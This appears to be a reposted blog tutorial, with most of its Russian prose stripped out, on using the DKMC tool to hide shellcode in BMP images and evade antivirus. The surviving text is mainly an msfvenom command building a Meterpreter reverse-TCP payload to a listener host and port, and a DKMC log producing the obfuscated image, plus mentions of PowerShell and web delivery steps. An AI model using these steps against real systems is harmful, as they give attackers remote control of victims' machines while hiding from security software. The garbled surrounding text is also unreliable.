-

   rss_rss_hh_full

 - e-mail

 

 -

 LiveInternet.ru:
: 17.03.2011
:
:
: 1

:


?

, 26 2017 . 13:37 +
antgorka 13:37

?



    ? DKMC (Don't Kill My Cat).

    ?






    - ?

    . jpeg, bmp. bmp- HEX-, .



    0x00200A04. . , BMP . . .



    5 , , .

    - , , , , BM ASCII, 42 4D, , 8 . , 8 , jmp-, -, , .. 0x00200A04.

    - , , .

    , , PowerShell .

    DKMC, .

    ?


    GitHub . , , , DKMC.



    python dkmc.py





    . msfvenom

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f raw > mycode

    - 192.168.1.3, 4444, .

    sc, HEX



    BMP gen





    (generate)>>> run
    	[+] Image size is 1000 x 700
    	[+] Generating obfuscation key 0x14ae6c1d
    	[+] Shellcode size 0x14d (333) bytes
    	[+] Adding 3 bytes of padding
    	[+] Generating magic bytes 0x4d9d392d
    	[+] Final shellcode length is 0x19f (415) bytes
    	[+] New BMP header set to 0x424de9040a2000
    	[+] New height is 0xb7020000 (695)
    	[+] Successfully save the image. (/root/av_bypass/DKMC/output/prettycat.bmp)
    

    , - , , BMP jump , 700 695.

    ps powershell -



    web -



    Wireshark , Powershell



    HTTP ,



    , . , .
    Original source: habrahabr.ru (comments, light).

    https://habrahabr.ru/post/338670/

    :  

    : [1] []
     

    :
    : 

    : ( )

    :

      URL